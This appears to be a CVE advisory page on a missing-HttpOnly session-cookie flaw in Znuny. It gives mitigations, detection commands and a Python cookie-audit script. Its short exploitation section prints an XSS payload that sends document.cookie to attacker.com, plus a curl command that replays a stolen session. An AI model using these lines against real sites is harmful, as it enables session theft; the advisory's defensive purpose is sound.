How CVE-2025-26844 Works
CVE-2025-26844 affects Znuny up to version 7.1.3, which fails to set the `HttpOnly` flag on its session cookies. Without `HttpOnly`, the browser exposes the cookie to page scripts through `document.cookie`, so an attacker who can run script in a victim's session via Cross-Site Scripting (XSS) can read the session token and reuse it; `HttpOnly` does not stop the XSS itself, but it keeps the cookie out of the script's reach. Sensitive session tokens therefore remain exposed, increasing the risk of session hijacking. The vulnerability stems from improper cookie configuration in the application's session management.
DailyCVE Form
Platform: Znuny
Version: ≤ 7.1.3
Vulnerability: Missing HttpOnly
Severity: Medium
Date: 06/12/2025
Prediction: Patch by 08/2025
What Undercode Says:
Exploitation
1. XSS Attack Vector:
document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '">');
2. Session Hijacking:
curl -H "Cookie: stolen_session=XYZ" http://victim-znuny/dashboard
Protection
1. Manual Patch:
In Znuny's session config: $Self->{HttpOnly} = 1;
2. Nginx Mitigation:
proxy_cookie_path / "/; HttpOnly; Secure";
3. Apache Mitigation:
Header edit Set-Cookie ^(.*)$ "$1; HttpOnly; Secure"
Detection
1. Cookie Audit:
curl -I http://znuny-instance.com | grep -i set-cookie
2. Automated Scan:
nmap --script http-security-headers -p 443 znuny-instance.com
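The cookie audit above can also be run offline against a captured response, and the same parsing shows what the reverse-proxy rewrites in the Protection section actually do to a `Set-Cookie` header, including the case where a cookie already carries the flags. The Python script below is an added example written for this page; it is not code from Znuny or from the original post. The response headers and cookie names in it (`SessionID`, `Prefs`, `UILang`) are constructed for illustration, `apply_header_edit` is a Python emulation of Apache's `Header edit` (using `\1` where Apache uses `$1`), and `fetch_headers` is a hypothetical helper for pointing the audit at a live instance.

```python
"""Audit Set-Cookie headers for HttpOnly/Secure and emulate the proxy-side fix.

All sample data below is constructed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of response headers, shaped like a login response whose
# session cookie lacks HttpOnly (the defect this CVE describes).
SAMPLE_RESPONSE_HEADERS: List[Tuple[str, str]] = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Set-Cookie", "SessionID=deadbeef0123; path=/; SameSite=Lax"),
    ("Set-Cookie", "Prefs=theme%3Ddark; path=/; HttpOnly; Secure"),
    ("Set-Cookie", "UILang=en; path=/; Max-Age=31536000; Secure"),
]


def parse_set_cookie(value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into its name, value and attribute map.

    Attribute names are lower-cased (they are case-insensitive per RFC 6265);
    flag attributes such as HttpOnly map to True, valued ones to their string.
    """
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return {"name": name.strip(), "value": cookie_value, "attrs": attrs}


def audit_cookies(headers: List[Tuple[str, str]],
                  required: Tuple[str, ...] = ("httponly", "secure")) -> List[dict]:
    """Return one finding per Set-Cookie header that lacks a required flag.

    An empty list means every cookie in the response passes the audit.
    """
    findings = []
    for hname, hval in headers:
        if hname.lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(hval)
        missing = [flag for flag in required if flag not in cookie["attrs"]]
        if missing:
            findings.append({"name": cookie["name"], "missing": missing})
    return findings


def harden_set_cookie(value: str) -> str:
    """Append HttpOnly/Secure only when absent, so repeated application is a no-op.

    This is the behaviour a reverse-proxy rewrite should have; a blind
    append would duplicate flags on cookies the application already hardens.
    """
    attrs = parse_set_cookie(value)["attrs"]
    out = value.rstrip().rstrip(";")
    if "httponly" not in attrs:
        out += "; HttpOnly"
    if "secure" not in attrs:
        out += "; Secure"
    return out


def apply_header_edit(pattern: str, replacement: str, value: str) -> str:
    """Emulate Apache 'Header edit': replace the first match of pattern in value.

    Useful for checking a rule before deploying it: a pattern such as ^(.)$
    matches only single-character header values and therefore changes nothing.
    """
    return re.sub(pattern, replacement, value, count=1)


def fetch_headers(url: str) -> List[Tuple[str, str]]:
    """Hypothetical helper: fetch live response headers with a HEAD request
    (like curl -I). Requires network access; not used by the offline demo."""
    import urllib.request
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req) as resp:
        return list(resp.getheaders())


if __name__ == "__main__":
    import sys
    headers = fetch_headers(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RESPONSE_HEADERS
    for finding in audit_cookies(headers):
        print(f"{finding['name']}: missing {', '.join(finding['missing'])}")
    for hname, hval in headers:
        if hname.lower() == "set-cookie":
            print("hardened:", harden_set_cookie(hval))
```

Run it without arguments to audit the constructed sample (the `SessionID` cookie is reported as missing both flags), or pass a URL to audit a live response. Note that a HEAD request, like `curl -I`, may not trigger the login flow that sets the session cookie, so for a real audit capture the headers of the response that actually issues the session.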
Analytics
- CVSS: 5.4 (Medium)
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required (XSS)
Expected Patch
- Vendor Fix: Enforce `HttpOnly` in default cookie settings.
- Workaround: Apply reverse proxy cookie modifications.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode